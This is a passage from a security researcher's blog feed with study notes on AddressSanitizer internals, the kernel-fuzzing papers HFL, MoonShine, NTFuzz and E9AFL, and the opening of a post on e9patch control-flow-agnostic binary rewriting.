    <content type="html"><![CDATA[<h2 id="简介">简介</h2><p>这里存放阅读论文/读代码时所记录下的一些<strong>零碎</strong>笔记。</p><p>由于这部分活动在记录笔记时，出于时间与重要性考虑，只会记录下较为重要的一部分，不会完整记录，因此单篇笔记的篇幅不会太长。</p><blockquote><p>原先是想着把这些随笔放到周报里去，但是这会打乱周报的排版，思来想去还是想单独立一篇文章出来。</p></blockquote><span id="more"></span><h2 id="一、Address-Sanitizer-LLVM-3-1">一、Address Sanitizer LLVM 3.1</h2><p>阅读 Address Sanitizer LLVM 3.1 最早期的源代码。</p><ul><li><p>Asan 使用 8 字节映射至 1字节的粗粒度内存映射。每块虚拟内存都会对应一块 shadow memory。</p><blockquote><p>8字节的粗粒度，是因为 malloc 返回地址会对齐8字节。</p></blockquote><p>其中 shadow byte 上的值表示 origin memory 中前 n 个字节是可访问的。</p></li><li><p>Asan 会在 LLVM pass 过程的末尾，对所有的内存读写操作进行插桩，检查当前访问的内存地址所对应的 shadow byte 的值是否说明当前地址可访问。如果不可访问则直接abort。</p></li><li><p>对于溢出检测，asan 会在用户内存的<strong>左右</strong>两边分别加上一块大小固定的 redzone，其中 redzone 所对应的 shadow memory 将会被加毒。这样当访问到 redzone 时将触发 asan。</p><blockquote><p>加毒（poison) 指的是将某块用户内存所对应的 shadow memory 标记为不可访问。</p></blockquote></li><li><p>对于栈内存来说，它会先分配一块 <strong>原始栈大小 + (等待被 redzone 检测的变量个数 + 1) * redzone 大小</strong>的内存，然后修改那些目标变量的 alloc 指令的偏移量。（poisonStackInFunction 函数）</p><p>之后，将一些栈上的信息放入当前栈帧最左边的 redzone里。</p><p>在函数头部，插入给当前栈帧 redzone 加毒的操作；并在所有 ret 语句之前插入 redzone 解毒的操作。</p><p>对于当前函数，若当前函数执行了一些 noret 的函数（例如 exit、execve），则在执行这些 noret 函数之前，必须对其解毒，防止误报。处理 no ret call 是为了防止有不返回的函数调用导致调用后栈上的 poison 信息没有被处理。</p></li><li><p>但需要注意的是，asan 只会在<strong>全局变量</strong>的<strong>右边</strong>加 redzone。 （insertGlobalRedzones 函数）</p><p>同时，虽然全局变量的 redzone 的添加操作是以插桩的形式加入程序中，但全局变量的加毒解毒操作是位于 runtime 中。</p></li><li><p>Asan 会 hook memcpy 等内存处理或字符串处理的 lib 函数，以达到更好的效果。（InitializeAsanInterceptors 函数）</p></li><li><p>asan 除了检测 内存越界读写以外，它同样检测 UAF 和 use after return。</p><ul><li><p>UAF</p><p>asan hook 掉了 malloc、free、realloc 等函数，创建了自己的内存管理机制，在分配内存时对内存解毒，在释放内存时加毒。</p><p>对于动态分配的内存，一共有三种主要状态，分别是：可分配、检疫、已分配。当某个内存块被释放时，该内存块将会被设置为<strong>检疫</strong>状态，并放置到检疫队列中。等到检疫队列数量超过阈值后，再将其中的检疫内存放回可分配内存池中。这样做的目的是为了<strong>延长某块内存从被释放到被二次分配的过程</strong>，延长检测 UAF 的窗口期。</p></li><li><p>use after return</p><p>在替换栈帧上原始 alloc 为新 alloc 之前，asan 会先分配一块 fake stack, 
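and then, when rewriting the alloca instructions, redirects their addresses into the fake stack. As a result, local variables with redzones are allocated on the fake stack rather than on the original stack.</p><p>When the current function returns, the fake stack is poisoned again. Note that the fake stack is <strong>not reclaimed</strong> at this point.</p><p>So when is a fake stack reclaimed? When a fake stack is allocated. Allocation also inspects the call stack of fake stacks: it walks every fake stack on that call stack and checks whether the real_stack address associated with it is greater than the current runtime stack. If it is, that fake stack is no longer needed and is released.</p></li></ul></li><li><p>The first version of asan has limitations. For example, it does not detect overflows into the <strong>small padding regions inserted between struct members for alignment</strong>, nor overflows that land in <strong>another block of user-accessible memory</strong>. Overall, though, the implementation works very well.</p></li></ul><blockquote><p>Thanks to sad for sharing these notes.</p></blockquote><h2 id="二、HFL-Hybrid-Fuzzing-on-the-Linux-Kernel">2. HFL: Hybrid Fuzzing on the Linux Kernel</h2><p>The paper <code>HFL: Hybrid Fuzzing on the Linux Kernel</code> combines fuzzing with symbolic execution and mainly addresses three problems:</p><ul><li><p>Indirect control-flow transfers determined by syscall arguments make symbolic execution inefficient. The typical case looks like this:</p><p><img src="/2022/03/other_paper_notes/image-20220227202648534.png" alt="image-20220227202648534"></p><ul><li>Random fuzzing cannot efficiently handle cases where <strong>the index into a function pointer table comes from an argument</strong>.</li><li>With symbolic execution, indexing a function table with a symbol can lead to a symbolic dereference, and the engine also has to explore the symbol's entire value space.</li></ul><p><strong>Solution</strong>: an <strong>offline</strong> translator built on the kernel source that converts indirect control flow into direct control flow at <strong>compile time</strong>:</p><p><img src="/2022/03/other_paper_notes/image-20220227202903484.png" alt="image-20220227202903484"></p></li><li><p>Syscall sequences and dependencies must be inferred in order to control and match the internal system state; otherwise fuzzing is inefficient.</p><p>Approach:</p><ol><li><p>First, static analysis (presumably dominated by pointer analysis) collects, across multiple syscalls, a set of candidate <strong>read/write pairs</strong> that <strong>access the same memory location</strong>. The read and the write are in different syscalls: one syscall writes the location and another reads it.</p></li><li><p>The candidates are then validated at runtime. Because static analysis produces false positives, HFL checks during execution whether a read/write pair really accesses the same memory location. If it does, the candidate is a true dependency pair.</p><p>The writing syscall must come before the reading one, because <strong>a value has to be written before it can be read</strong>.</p></li><li><p>Symbolic execution is used to determine dependencies between syscall arguments, for example that an argument of syscall2 equals some argument of syscall1. The workflow diagram below shows the details.</p></li></ol><p>The workflow is as follows:</p><p><img src="/2022/03/other_paper_notes/image-20220227203857407.png" alt="image-20220227203857407"></p></li><li><p>Inferring the nested argument types used to invoke syscalls. This uses the familiar approach of monitoring the copy_from_user function to detect syscall 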
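arguments that are nested. There is not much more to say here; a picture is worth a thousand words.</p><p><img src="/2022/03/other_paper_notes/image-20220227204307290.png" alt="image-20220227204307290"></p></li></ul><p>Beyond these three problems, the timing of switching between fuzzing and symbolic execution also matters in hybrid fuzzing. HFL's fuzzer <strong>maintains a frequency table that counts how many times each branch evaluated to true and to false</strong>. I find this design quite interesting, but the site that hosted the source code has been shut down, so I could not find the source.</p><h2 id="三、MoonShine-Optimizing-OS-Fuzzer-Seed">3. MoonShine: Optimizing OS Fuzzer Seed</h2><p>The paper <code>MoonShine: Optimizing OS Fuzzer Seed</code> mainly describes how to extract OS fuzzer seeds from real system call sequences (seed distillation) while preserving dependencies. It gives two interesting definitions of dependency. For syscalls $C_i$ and $C_j$:</p><ul><li><p>Explicit dependency: if a value produced by $C_i$ is used as an argument of $C_j$, then $C_j$ depends on $C_i$, so $C_i$ naturally has to be called before $C_j$.</p><p><img src="/2022/03/other_paper_notes/image-20220227211315342.png" alt="image-20220227211315342"></p></li><li><p>Implicit dependency: if executing $C_i$ affects the execution of $C_j$ <strong>through reads and writes of shared variables</strong>, then $C_j$ depends on the execution of $C_i$.</p><p><img src="/2022/03/other_paper_notes/image-20220227211330243.png" alt="image-20220227211330243"></p></li></ul><p>MoonShine establishes dependencies as follows:</p><ul><li><p>For <strong>explicit dependencies</strong>, MoonShine builds a dependency graph: walking the call sequence, it links syscall return values to the syscall arguments that consume them.</p></li><li><p>For <strong>implicit dependencies</strong>, MoonShine analyzes the read/write dependencies within a pair of syscalls. That is, if the set of global variables read by $C_i$ intersects the set of global variables written by $C_j$, the two syscalls have an implicit dependency. Note that, limited by the precision of static analysis, implicit dependencies may be overestimated or underestimated.</p></li></ul><blockquote><p>Note that:</p><ol><li>If $C_i$ <strong>implicitly</strong> depends on $C_j$, and $C_j$ <strong>explicitly</strong> depends on $C_k$, then $C_i$ <strong>implicitly</strong> depends on $C_k$.</li><li>If $C_i$ <strong>explicitly</strong> depends on $C_j$, and $C_j$ <strong>implicitly</strong> depends on $C_k$, then $C_i$ <strong>explicitly</strong> depends on $C_k$.</li></ol></blockquote><p>The pseudocode of the algorithm is shown below and is fairly easy to follow:</p><p><img src="/2022/03/other_paper_notes/image-20220227213931466.png" alt="image-20220227213931466"></p><p>The overall idea of the algorithm:</p><ul><li>First, sort the syscalls by coverage and process those with higher coverage first.</li><li>Then iterate over the syscall sequence, collect the implicit and explicit dependencies of each call, and add them to the corpus sequence.</li></ul><p><img src="/2022/03/other_paper_notes/image-20220227213945270.png" alt="image-20220227213945270"></p><h2 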
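id="四、Scalable-Fuzzing-of-Program-Binaries-with-E9AFL">4. Scalable Fuzzing of Program Binaries with E9AFL</h2><p>Notes on the paper <code>Scalable Fuzzing of Program Binaries with E9AFL</code>:</p><p>e9afl is a tool that instruments stripped binaries to provide coverage feedback; the instrumented program can be fuzzed directly with AFL. Compared with other approaches to fuzzing binary-only targets, its advantage is that the instrumentation overhead stays low while precision remains high.</p><p>The instrumentation process has three main steps:</p><ol><li><p>Design the trampoline template to be inserted. There is not much to say here; it essentially mirrors AFL's instrumentation:</p><p><img src="/2022/03/other_paper_notes/image-20220302154604172.png" alt="image-20220302154604172"></p></li><li><p>Inject the runtime. This step injects the fork server, shared-memory initialization and similar setup into the binary so that they run before the main function.</p></li><li><p>Determine the set of instruction locations to instrument. e9afl implements its own lightweight control-flow analysis to find all possible jump targets, both direct and indirect. Indirect targets are identified by <strong>analyzing jump tables and code pointers in the data sections</strong>.</p><p>Interestingly, although static control-flow analysis may be imprecise (finding too many or too few jump targets), these errors do not have much impact on the fuzzing process as a whole.</p></li></ol><p>Note that if e9afl only inserted trampolines without optimizing them, the program would run very slowly. Although the fork server speeds up program startup, the forked child processes <strong>trigger a large number of page faults</strong>, because they execute trampolines frequently and fault on the pages that hold them.</p><p>Page faults are the main bottleneck for e9afl's performance and therefore need to be optimized. The paper proposes three optimization strategies:</p><ol><li><p>trampoline ordering</p><p>Allocate trampoline memory in the same order as the patched instructions.</p><p>What does this mean? My understanding is that, for a given code region (say, at <strong>function</strong> granularity), e9afl tries to <strong>place all trampolines used by that function in the same page (or in a compact group of pages)</strong>. In other words, instructions whose patch points are adjacent should, as far as possible, have adjacent trampolines.</p><p>The rationale is that <strong>most</strong> of the trampolines in a function are likely to be executed. If all of a function's trampolines are grouped together, then executing the first one, trampoline1, triggers a page fault (which is expected), but executing the next one, trampoline2, does not, because trampoline1 and trampoline2 are in the same memory region.</p></li><li><p>instruction selection</p><p>The previous optimization does not always apply, for example when patching relies on instruction punning and the reachable trampoline addresses are limited. <strong>This optimization tries to instrument other locations within the basic block instead of only the block's first instruction.</strong> e9afl searches <strong>the same basic block for another instruction whose size is &gt;= 5 bytes</strong> and instruments that instruction.</p><p><img src="/2022/03/other_paper_notes/image-20220302161136498.png" alt="image-20220302161136498"></p></li><li><p>bad block elimination</p><p>If neither of the two optimizations above can be applied, the corresponding trampoline is very likely to trigger page faults and slow down fuzzing. This optimization therefore focuses on <strong>removing unnecessary 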
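trampoline instrumentation</strong>.</p><p>For example, if every path through BasicBlockA also passes through BasicBlockB, it is enough to record coverage for only one of the two blocks. This is the path differentiation problem.</p><blockquote><p>Note: e9afl calls basic blocks <strong>to which neither of the two optimizations above can be applied</strong> bad blocks; all others are good blocks.</p></blockquote><p>Here, however, e9afl focuses on eliminating the instrumentation of bad blocks. It proceeds as follows:</p><ol><li><p>Initially, label every basic block according to these rules:</p><ol><li>Every good block is initially labeled unoptimized.</li><li>Every bad block that <strong>may be an indirect jump target</strong> is initially labeled unoptimized.</li><li>All other bad blocks are initially labeled optimized.</li></ol></li><li><p>Next, try to solve the path differentiation problem. Consider every sub-path $\sigma=\langle A\rightarrow\dots\rightarrow B\rangle$ that satisfies the following conditions:</p><ol><li>Both blocks of the pair <code>&lt;A, B&gt;</code> are unoptimized.</li><li>All basic blocks between <code>&lt;A,B&gt;</code> are optimized.</li></ol><p><img src="/2022/03/other_paper_notes/image-20220302174125760.png" alt="image-20220302174125760"></p><p><strong>If at least two such sub-paths $\sigma_1$ and $\sigma_2$ exist for the same pair <code>&lt;A,B&gt;</code>, the path differentiation property is violated and must be repaired</strong>.</p><p>The repair is greedy: change the optimized basic blocks on $\sigma_1$ and $\sigma_2$ to unoptimized, and repeat this recursively until no sub-paths violate the property.</p><p><img src="/2022/03/other_paper_notes/image-20220302175118541.png" alt="image-20220302175118541"></p></li></ol></li></ol><p>Finally, the evaluation of e9afl. The results are quite good, and e9afl can also handle large binaries such as chrome:</p><p><img src="/2022/03/other_paper_notes/image-20220302161245744.png" alt="image-20220302161245744"></p><h2 id="五、NTFUZZ-Enabling-Type-Aware-Kernel-Fuzzing-on-Windows-with-Static-Binary-Analysis">5. NTFUZZ: Enabling Type-Aware Kernel Fuzzing on Windows with Static Binary Analysis</h2><p>The NTFuzz paper proposes an interesting approach:</p><blockquote><p>Use static analysis to propagate the argument type information of <strong>documented</strong> <strong>user API functions</strong> to the argument types of <strong>undocumented</strong> <strong>system calls</strong>, bridging the information gap between the two.</p></blockquote><p>In general:</p><ol><li>Without argument type information, a fuzzer struggles to fuzz effectively or trigger bugs.</li><li>Undocumented system calls are usually associated with documented API functions.</li><li>Although API functions eventually make system calls, fuzzing at the API level is unlikely to trigger bugs, probably because API functions filter their arguments beforehand.</li></ol><p>Below is the architecture of NTFuzz, which consists of two main parts, a static analyzer and a dynamic kernel fuzzer:</p><p><img 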
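src="/2022/03/other_paper_notes/image-20220307203406916.png" alt="image-20220307203406916"></p><p>The key component is the Modular Analyzer in the static analyzer, which uses the <strong>function</strong> as its basic unit of analysis. Its basic algorithm is as follows:</p><p><img src="/2022/03/other_paper_notes/image-20220307204928524.png" alt="image-20220307204928524"></p><p>The inputs are the CFGs, the call graph and the API descriptions. The call graph is <strong>topologically sorted</strong> and the functions are visited <strong>bottom-up</strong> (callees are analyzed before callers). This lets the analysis of higher-level functions reuse the summaries already computed for lower-level functions, which reduces analysis time. Each summarize operation records <strong>the syscalls the function invokes</strong> and <strong>how its memory state changes</strong>.</p><p>This analysis order cannot handle <strong>recursive calls</strong> or <strong>indirect calls</strong>, so NTFuzz simply ignores them. In addition, the static analyzer must be able to:</p><ul><li>Track data flow across functions.</li><li>Track memory state across procedures. For example, a memory location may be modified in one function and then used in another, and such uses must be traceable.</li></ul><p>Next, let us look closely at the three parts of the static analyzer:</p><ul><li><p>Front-end</p><p>The front end does a few things: it reads the API descriptions, lifts the binary into simple IR statements, and builds the CFGs. The API descriptions come mainly from the Windows SDK, whose <strong>structured annotations</strong> also provide useful type information to NTFuzz. In addition, the lifted IR omits many opcodes that are irrelevant to type information or memory-state changes and keeps only a few important ones:</p><p><img src="/2022/03/other_paper_notes/image-20220307210748554.png" alt="image-20220307210748554"></p><p>Interestingly, unary operators and branch instructions are omitted. This is probably because unary operators usually do not modify memory, and branch information is already captured by the edges of the CFG.</p><p>To reduce the size of the call graph to be analyzed, NTFuzz starts from the syscall stub functions that contain a sysenter instruction and walks <strong>bottom-up</strong> through each function's <strong>callers</strong> until it reaches <strong>the first documented API function</strong>. The resulting set of functions is called S1. Analyzing S1 alone is not enough, however, because it does not include other functions that <strong>may be called by functions in S1</strong> and that modify memory state. So after computing S1, NTFuzz also collects, starting from S1, the set S2 of <strong>all functions that can be called by functions in S1</strong>. The <strong>set S1 + S2</strong> is then the <strong>set of target functions</strong> that NTFuzz analyzes statically.</p></li><li><p>Modular Analyzer</p><p>This is the most important part of the whole paper.</p><p>This component runs the summarize operation on each target function in turn. Overall, this stage uses <strong>flow-sensitive</strong> static analysis, which also helps support pointer analysis. As mentioned earlier, it records <strong>the argument values each function passes to syscalls</strong> (these are abstract values, not concrete ones) and <strong>how the memory state changes between function entry and exit</strong>. Concretely, it has two parts: the <strong>abstract domain</strong> and the <strong>abstract semantics</strong>.</p><p>The abstract domain, as I understand it, is used when extracting a function's summary 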
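to specify the range of certain variables or values. The main abstract domains it defines are:</p><p><img src="/2022/03/other_paper_notes/image-20220307222341920.png" alt="image-20220307222341920"></p><p>At first glance this looks more than a little complicated (and for a newcomer it really is), so let us work through it piece by piece.</p><ol><li><p>The set Z is the set of integers (the same Z as in high-school math).</p></li><li><p>The set I is the set of abstract integers. First, the notion of a symbol: a <strong>symbol</strong> is a fresh symbol introduced for each function argument. During static analysis we cannot know the concrete values of the arguments of each call, so a symbol stands in for them, much as in symbolic execution. For example:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">func</span><span class="params">(<span class="type">int</span> a )</span> </span>&#123;</span><br><span class="line">   <span class="type">int</span> b = a*<span class="number">3</span><span class="number">+1</span>;</span><br><span class="line">   <span class="keyword">return</span> b;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>During static analysis we can roughly treat the value of argument a as a symbol $\alpha$, so the value of variable b is $\alpha * 3 + 1$.</p><p>We can therefore represent a symbolic integer in the form $a*symbol+b$. When a is 0 it denotes a concrete integer; when a is nonzero it denotes a symbolic integer.</p><p>Interestingly, the set of abstract integers I is formed only after joining the symbolic integers with two extra elements, <strong>bottom</strong> ($\bot$, an inverted T) and <strong>top</strong> ($\top$, an upright T), where:</p><ul><li>$\bot$ denotes <strong>integers that carry no meaning for the analysis</strong>.</li><li>$\top$ denotes <strong>any integer</strong>.</li></ul><p>The paper defines how $\bot$ and $\top$ are added to ordinary abstract integers:</p><p><img src="/2022/03/other_paper_notes/image-20220307223812099.png" alt="image-20220307223812099"></p><blockquote><p>Because $\bot$ carries no meaning for the analysis, adding $\bot$ to a <strong>meaningful</strong> value i yields i.</p><p>Because $\top$ stands for any integer, adding $\top$ to another integer still yields an arbitrary integer, that is, $\top$.</p><p>My guess is that the result of this addition favors the more informative operand, with a rough precedence of $\top &gt; i &gt; \bot$.</p></blockquote><p>Next, a quick look at the result of adding two symbolic integers:</p><p><img src="/2022/03/other_paper_notes/image-20220307224215299.png" alt="image-20220307224215299"></p><p>Only under very restrictive conditions does adding two symbolic integers give a definite result; otherwise the set of possible results is very large and is represented by $\top$.</p></li><li><p>The set 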
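V represents the abstraction of a value in a function. A variable's properties are described by three components: an <strong>abstract integer</strong> (which numeric values it may take), a <strong>set of abstract locations</strong> (which memory locations are associated with it), and a <strong>set of abstract types</strong> (which types the value may have). A particular abstract value is <strong>represented as a triple</strong>: its numeric component is <strong>an element of the set I</strong>, its location component is a subset of L (an element of the <strong>power set</strong> of L), and its type component is a subset of T (an element of the <strong>power set</strong> of T).<br>The whole set of abstract values V is therefore <strong>I x (power set of L) x (power set of T)</strong>.</p><blockquote><p>Note that $2^T$ denotes the power set of T.</p></blockquote><blockquote><p>Memory locations are represented as a set because, during static analysis, a pointer may point to several memory locations; the same goes for types.</p></blockquote></li><li><p>The set L is the set of abstract memory locations. An abstract memory location can be one of the following:</p><ol><li><p>A fixed location in the global data area; $Global(Z)$ denotes the set of all possible global variable locations.</p></li><li><p>A fixed location on the stack. The pair (f, o) denotes the location at offset o in the stack frame of function f, so $Stack(function\space *\space Z)$ denotes the set of all possible stack variable locations. The heap is handled the same way, except that a heap location is written as a pair (a, o), meaning offset o from address a.</p><blockquote><p>All of the above are memory locations that are relatively fixed during static analysis.</p></blockquote></li><li><p>One more kind of memory location must be considered: the location at offset o from a symbolic pointer s, written SymLoc(s, o).</p></li></ol></li><li><p>The set T is the set of type <strong>constraints</strong>. A variable's type is either a concrete type or the same as the type of some symbol. Note that these are sets of <strong>constraints</strong>, so an empty constraint set means the value may have <strong>any type</strong>.</p></li></ol><p><strong>Abstract semantics</strong>, as I understand it, describes what an expr or stmt actually does. To understand it, recall the IR shown earlier:</p><p><img src="/2022/03/other_paper_notes/image-20220307210748554.png" alt="image-20220307210748554"></p><p>Now let us go through the evaluation of expr, one rule at a time:</p><p><img src="/2022/03/other_paper_notes/image-20220307233508336.png" alt="image-20220307233508336"></p><blockquote><p>Here $V$ takes an $expr$ and, under the abstract state $S$, returns the abstract value it denotes.</p></blockquote><p>First, what is an abstract state S?</p><p><img src="/2022/03/other_paper_notes/image-20220307233801692.png" alt="image-20220307233801692"></p><p>As the definition shows, an abstract state S is <strong>a pair</strong> consisting of <strong>a map from registers to V</strong> and <strong>a map from memory locations L to V</strong>. Put simply, a state holds everything about values: the value of every register and the value at every memory location.</p><blockquote><p>We therefore write S[0] for the register map R of state S, and S[1] for its memory map M.</p></blockquote><ul><li>$V(reg)(S)$: this rule is easy to understand. Given a reg in state S, it first takes the register map R of S (that is, S[0]) and then looks up reg 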
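as a key in that map to obtain its value.</li><li>$V([e])(S)$: given an expression $e$ in state S, this returns the value stored at the memory locations that e denotes. The right-hand side of the rule is best read in pieces. First we obtain the abstract value of e, namely $V(e)(S)$. An abstract value is a triple whose field 1 (counting from 0) is the memory location component, so $V(e)(S)[1]$ is <strong>the set of all memory locations of expression e</strong>. Finally, we read every one of those locations in state S and join the results: $\bigcup \{S[1][l] \mid l \in V(e)(S)[1]\}$</li><li>$V(i)(S)$: the abstract value of the integer expression $i$ in state S.<ul><li>When $i=0$, we cannot tell whether i is the integer 0 or the null pointer NULL, so its type constraint is left out.</li><li>When $i \in DataSection$, we know that i is a pointer to a global variable. The numeric value involved is not something we care about, so it is represented by $\bot$.</li><li>Otherwise i is treated as an ordinary integer.</li></ul></li><li>$V(e_1*e_2)(S)$: the value of a binary operation in state S. One special case: when <strong>operating on array elements</strong>, <strong>the memory location of the element is set to the array's base memory location</strong> rather than to the precise element location. This prevents an explosion in the number of memory locations caused by large index ranges.</li></ul><p>Next, the evaluation of Stmt:</p><p><img src="/2022/03/other_paper_notes/image-20220308084738528.png" alt="image-20220308084738528"></p><p>Here $m[k \rightarrow v]$ means <strong>a strong update of map m so that k maps to v</strong>; a w over the arrow denotes a <strong>weak update</strong>. With the expr rules understood, the Put, Store and update primitives are easy to follow, so I will not go through them. The Call primitive needs extra handling, because the called function may have side effects (such as modifying memory).</p><p>A function's side effect is defined as a pair, which records <strong>which arguments lead to which memory modifications</strong>:</p><p><img src="/2022/03/other_paper_notes/image-20220308091612142.png" alt="image-20220308091612142"></p><p>The apply operation applies the Update Set of a Side Effect to state S:</p><p><img src="/2022/03/other_paper_notes/image-20220308092314488.png" alt="image-20220308092314488"></p><p>The apply primitive uses an <strong>inverted-L symbol</strong>. My understanding is that it maps a memory location as seen from one function to the corresponding memory location as seen from another. That is a mouthful, so here is a simple example: the caller has a variable at $STACK(caller, -0x40)$, while the callee accesses $STACK(callee, -0x80)$ (the caller's local variable). The two functions appear to use different memory locations, but both actually refer to <strong>the same memory location</strong>, so a substitution is needed. The <strong>inverted-L symbol</strong> performs this <strong>substitution</strong>.</p></li><li><p>Type Inferrer</p><p>The type inferrer uses the summaries produced in the previous step to infer types. The hard parts are inferring <strong>struct types</strong> and <strong>array types</strong>.</p><p>First, <strong>struct type inference</strong>. For structs on the heap, the inferrer 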
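can derive the type by analyzing the state of the corresponding heap chunk. Structs on the stack, however, <strong>do not carry implicit boundary information the way heap chunks do</strong>, so their fields can be mistaken for separate local variables, and it is hard to tell which fields belong to a stack-allocated struct:</p><p><img src="/2022/03/other_paper_notes/image-20220308102221825.png" alt="image-20220308102221825"></p><p>NTFuzz proposes a heuristic here: use the memory access pattern within the function to decide whether a stack variable is part of a struct.</p><p>Informally, if an <strong>adjacent stack variable</strong> is <strong>never used</strong> after being initialized, it is taken to be part of a stack struct that will be passed to a syscall. If such a variable is not even initialized, it is taken to be initialized by the syscall.</p><p>Second, <strong>array type inference</strong>. An array type has two parts: the element type and the array size. The element type can be obtained from the documented APIs; the array size can be obtained from SAL annotations or from a size parameter of the API, and also by observing <strong>memory allocation patterns</strong>.</p><blockquote><p>Quite a few APIs take both an array pointer and an array size as parameters, so the size can be obtained by analyzing these APIs.</p></blockquote></li></ul>]]></content>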
    
    
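    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;Introduction&lt;/h2&gt;
&lt;p&gt;This post collects &lt;strong&gt;scattered&lt;/strong&gt; notes taken while reading papers and source code.&lt;/p&gt;
&lt;p&gt;For reasons of time and priority, these notes record only the more important points rather than everything, so each individual note is fairly short.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I originally planned to put these notes into my weekly reports, but that would have disrupted the reports' layout, so after some thought I decided to give them a post of their own.&lt;/p&gt;
&lt;/blockquote&gt;</summary>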
    
    
    
    <category term="论文阅读" scheme="https://kiprey.github.io/categories/%E8%AE%BA%E6%96%87%E9%98%85%E8%AF%BB/"/>
    
    
    <category term="paper" scheme="https://kiprey.github.io/tags/paper/"/>
    
  </entry>
  
  <entry>
    <title>Paper Notes: Binary Rewriting without Control Flow Recovery</title>
    <link href="https://kiprey.github.io/2022/02/e9patch/"/>
    <id>https://kiprey.github.io/2022/02/e9patch/</id>
    <published>2022-02-24T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.997Z</updated>
    
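    <content type="html"><![CDATA[<h2 id="一、概述">1. Overview</h2><p>Binary rewriting is useful in many scenarios, such as repair, hardening, instrumentation, patching and debugging. Most binary rewriting techniques depend on <strong>recovering control flow information</strong> from the input binary, because they usually move instructions around, which requires adjusting the relative offsets of other jump instructions, that is, fixing up the <strong>set of jump targets</strong>.</p><p>The problem is that <strong>recovering control flow information from a binary is quite hard</strong>:</p><ul><li>One approach <strong>relies on specific binary metadata</strong>, such as debug symbols, to recover relocation information, but not all binaries contain such metadata (for example, stripped binaries).</li><li>Another approach <strong>uses static binary analysis</strong> for the recovery, but the results are often poor and it does not scale to large binaries.</li></ul><p>Most binary rewriting techniques therefore rest on one or more sets of assumptions, such as a specific compiler or a specific programming language. This limits them, makes them hard to scale, and leaves them unable to handle large programs such as chrome.</p><p>This paper presents a binary rewriting technique for <strong>x86_64</strong> called e9patch, where <code>e9</code> refers to 0xe9, the opcode of <code>jmpq rel32</code>. Its advantage is that it is <strong>control flow agnostic</strong>: it <strong>requires no knowledge of control flow</strong>. The rewriting method preserves the set of jump targets, so no control flow recovery is needed. As a result the tool is quite robust and can patch binaries larger than 100MB, such as chrome.</p><p>Besides ordinary executables, e9patch can also patch shared objects and libraries.</p><span id="more"></span><h2 id="二、背景">2. Background</h2><p>A control-flow-agnostic rewriter does not need to know the set of jump targets. It treats every instruction as a potential jump target and, when control reaches that instruction, <strong>preserves the instruction's semantics</strong> (note: the semantics, not necessarily the original instruction). That is, every instruction in the binary satisfies one of the following three conditions:</p><ul><li>The original instruction is kept.</li><li>It is replaced by an operationally equivalent instruction.</li><li>It is replaced by instructions that serve a specific purpose, such as repair or instrumentation.</li></ul><p>Below are several control-flow-agnostic rewriting techniques, which e9patch builds upon.</p><h3 id="B0-int3-断点">B0: int3 Breakpoints</h3><p>This is probably the simplest technique in principle. The target instruction is patched into an int3 breakpoint; when control reaches it, a SIGTRAP is raised and a signal handler takes over (or, in some use cases such as trapfuzz, a debugger), so the patch logic can run inside the signal handler.</p><p>The drawback is a high performance cost. Interrupts and switching to the signal handler involve context switches between user and kernel mode, which can raise the time overhead by an order of magnitude.</p><h3 id="B1-Jumps">B1: Jumps</h3><p>This approach replaces the target instruction with a <code>jmpq rel32</code> instruction, so that control jumps to a trampoline when it reaches this point. The trampoline executes the patch code and, if needed, the original instruction that was replaced. One application of this method is inline hooking:</p><p><img src="/2022/02/e9patch/CodeFlow.png" alt="img"></p><p>This method has its own limitation. A <code>jmpq rel32</code> instruction is 5 bytes long. If the instruction to be patched is <strong>at least 5 bytes long</strong>, the jmpq can simply replace it, and the rewrite remains <strong>control flow agnostic</strong>.</p><p>But what if the instruction to be patched is shorter than 5 bytes? In the figure above, replacing the <code>mov edi, edi</code> instruction with a <code>jmpq</code> also overwrites the two instructions that follow it. If some jmp 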
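in the function targets one of those two overwritten instructions, an exception occurs, because the bytes at the jump target have been tampered with.</p><h3 id="B2-Instruction-Punning">B2: Instruction Punning</h3><blockquote><p>This technique deserves special attention, because e9patch is an extension of it.</p></blockquote><p>Besides the two methods above, there is another that works with <strong>jmpq instructions that can safely overlap other instructions</strong>. It is called instruction punning. The basic idea is to <strong>find a relative offset value whose byte representation coincides with the bytes of any overlapped instructions</strong>, and then use that offset to safely replace the patched instruction with a <code>jmpq</code>.</p><p>A simple example:</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">mov</span> %rax, (%rbx)</span><br><span class="line"><span class="keyword">add</span> <span class="number">$32</span>, %rax</span><br></pre></td></tr></table></figure><p>In machine code this is the row labeled original in the figure below:</p><p><img src="/2022/02/e9patch/image-20220224094232075.png" alt="image-20220224094232075"></p><p>Suppose we need to patch <code>mov %rax, (%rbx)</code>. Instruction punning can reuse the first two bytes of the next instruction (0x48 0x83) to form a five-byte jmpq at the patch location (<code>jmpq 0x8348xxxx</code>) without modifying the bytes of the next instruction.</p><p>When control reaches the location of the <code>mov</code> instruction, it takes the jmpq. And if some other instruction needs to jump to the add instruction, the add still works correctly, because its bytes have not been modified.</p><p>The pun in instruction punning is that the <strong>opcode bytes</strong> of the next instruction <strong>represent both that instruction and part of the jmpq offset</strong>.</p><p>This method also has limitations. The two high-order bytes of the jmp's relative offset <strong>are fixed by the bytes of the next instruction</strong>. The reachable memory is therefore restricted to relative offsets in the range <code>0x83480000~0x8348ffff</code>. That range is not always available; it may correspond to:</p><ul><li>the memory region of another trampoline</li><li>other code or data segments</li><li>an invalid address range, for example near NULL or underflowing into negative addresses</li></ul><p>In this figure, the relative offset 0x8348xxxx is actually negative (as a signed 32-bit offset). With a negative offset, the actual target may lie near NULL or even underflow into the negative address range, and such memory can be hard to mmap.</p><p>Instruction punning can therefore patch only some instructions, and its patch coverage is not high.</p><h2 id="三、设计">3. Design</h2><p>e9patch makes a series of improvements on top of methods B1 and B2. Before describing them, here are the assumptions the tool relies on:</p><ul><li>The patched instructions must not be <strong>read by the program itself</strong> (for example, for self-checksumming) or <strong>written by the program itself</strong>.</li><li>The instrumentation or patch 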
